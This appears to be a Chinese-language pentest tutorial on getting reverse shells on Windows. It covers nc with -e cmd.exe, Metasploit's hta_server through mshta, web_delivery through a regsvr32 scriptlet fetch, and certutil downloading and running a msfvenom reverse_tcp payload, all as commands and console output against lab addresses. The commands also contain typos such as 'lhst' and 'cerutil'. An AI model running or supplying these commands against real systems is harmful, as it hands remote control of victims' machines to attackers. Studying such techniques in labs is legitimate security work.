Windows反弹shell

Windows反弹shell

1. nc

是一款很牛逼的一款网络工具
windows7 靶机:
nc.exe -lvvp 6666 -e cmd.exe

Linux攻击机:
nc 192.168.10.145 6666

shell

2. mshta.exe

Mshta.exe是用于负责解释运行hta(HTML应用程序)文件的Windows OS实用程序,可以运行javascript或VBscript的html文件
也是windows自带的程序

通过Metasploit的HTA Web Server模块发起HTA攻击:

use exploit/windows/misc/hta_server
show options
set srvhost 192.168.10.1
msf5 exploit(windows/misc/hta_server) >exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.


msf5 exploit(windows/misc/hta_server) > [*] Server started
[*] Started reverse TCP handler on 192.168.0.112:4444 
[*] Using URL: http://192.168.10.1:8080/a0nsMafZ8oN.hta




[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/misc/hta_server) > sessions

Active sessions
===============

  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  1         meterpreter x86/windows  hsm-PC\hsm @ HSM-PC  192.168.0.112:4444 -> 192.168.0.112:32947 (192.168.10.145)
msf5 exploit(windows/misc/hta_server) > shell
[-] Unknown command: shell.
msf5 exploit(windows/misc/hta_server) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2464 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

3.Regsvr32.exe

通过Metasploit的Web Delivery模块启动Regsvr32
Regsvr32是windows自带的程序

msf5 > use exploit/m
Display all 333 possibilities? (y or n)
msf5 > use exploit/multi/script/web_delivery 
msf5 exploit(multi/script/web_delivery) > set srv
set srvhost  set srvport  
msf5 exploit(multi/script/web_delivery) > set srv
set srvhost  set srvport  
msf5 exploit(multi/script/web_delivery) > set srv
set srvhost  set srvport  
msf5 exploit(multi/script/web_delivery) > set srvhost 192.168.10.1
srvhost => 192.168.10.1
msf5 exploit(multi/script/web_delivery) > set target 3//能够被..解释执行

截图录屏_选择区域_20200519203754.png


msf5 exploit(multi/script/web_delivery) > set payload windows/
Display all 216 possibilities? (y or n)
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set lhost  192.169.10.1
lhost => 192.169.10.1
msf5 exploit(multi/script/web_delivery) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 192.169.10.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Using URL: http://192.168.10.1:8080/mrSJR3O4HQz7
msf5 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.169.10.1:8080/mrSJR3O4HQz7.sct scrobj.dll

4.Certuil.exe

Certuil.exe是作为证书服务的一部分安装的命令行程序,我们可以使用此工具在目标计算机中执行恶意的exe文件以获得meterpreter会话
Linux:

msfvenom -p windows/meterpreter/reverse_tcp lhst=192.160.10.1 lport=6666 -f exe > shell.exe

Windows:

cerutil.exe -urlcache -split -f http://192.168.10.1:8000/shell.exe & shell.exe

cerutil.exe -urlcache -split -f http://192.168.10.1:8000/shell.exe delete